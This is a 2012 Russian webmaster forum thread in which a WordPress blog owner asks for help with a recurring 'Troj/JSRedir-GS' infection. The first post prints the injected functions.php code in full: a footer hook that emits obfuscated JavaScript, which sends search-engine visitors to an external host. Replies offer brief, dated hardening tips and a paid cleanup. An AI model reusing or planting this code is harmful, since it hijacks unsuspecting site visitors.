X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вирус Troj/JSRedir-GS, напоминает хамелеона
ramnek
ramnek
Topic Starter сообщение 25.4.2012, 9:50; Ответить: ramnek
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 575
Регистрация: 29.11.2008
Поблагодарили: 110 раз
Репутация:   14  


Добрый день.

Есть блог на WP. Яндекс якобы нашел на нем вирус Troj/JSRedir-GS. Пробовал _http://sitecheck.sucuri.net/ действительно есть вирус. Нашел его внизу functions.php:
<?php
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query
||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|locati
o
n'.split('|'),0,{}))</script>";
            }
        }
    }
?>


Естественно удалил, но через дней 5 он опять появился в functions.php. Сменил пароли, обновил все плагины, удалил вирус и через пару дней он опять появился.

Сканер показал, что вирус есть, я полез в functions.php, но там его нету =) Я опять сканером проверил и вируса уже он не нашел... Что это за бред?

Я уже скачивал полностью сайт на компьютер, но касперский ничего не смог найти...
Я с вирусами знаком уже давно... Пожалуй, это самый трудно находимый вирус среди всех других, которые я знал, поскольку файлы никакие не изменяются по дате...

Поискал в интернете эту проблему, но никто толком не смог ничего сказать...

Если есть желающие помочь не только советом, но и делом, пишите в личку стоимость Вашей услуги..

Сообщение отредактировал ramnek - 25.4.2012, 9:51


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Sickboy
Sickboy
сообщение 25.4.2012, 14:13; Ответить: Sickboy
Сообщение #2


Эффективное SEO
*****

Группа: Active User
Сообщений: 900
Регистрация: 18.11.2010
Из: Интернета
Поблагодарили: 624 раза
Репутация:   98  


Та же фигня, надоел уже этот вирус. Удаляешь - он снова появляется.
Если кто-то знает, где проблема - очень хотелось бы услышать.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OMGet
OMGet
сообщение 25.4.2012, 14:32; Ответить: OMGet
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 561
Регистрация: 7.11.2011
Поблагодарили: 220 раз
Репутация:   27  


обновите вордпресс до 3.2.2 и на папку можно выставить права, которые запретят редактирование и все
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 25.4.2012, 17:55; Ответить: House
Сообщение #4


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


50 долларов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вирус на службе маркетинга
2 jack 631 9.10.2017, 19:33
автор: jack
Открытая тема (нет новых ответов) Помогите удалить вирус на joomla 1.5
Готов оплатить помощь.
5 pulsar21 2000 17.5.2013, 8:00
автор: pulsar21
Открытая тема (нет новых ответов) Найти вирус и удалить.
3 Minato 1068 2.2.2013, 20:24
автор: EvilGomel
Открытая тема (нет новых ответов) Вирус в DLE. Уничтожить за плату.
4 Seo-optimist 1788 30.12.2010, 15:23
автор: bobur
Открытая тема (нет новых ответов) вирус на сайте
5 RazBoy 2307 12.5.2010, 6:36
автор: viitalik


 



RSS Текстовая версия Сейчас: 13.12.2017, 15:35
Дизайн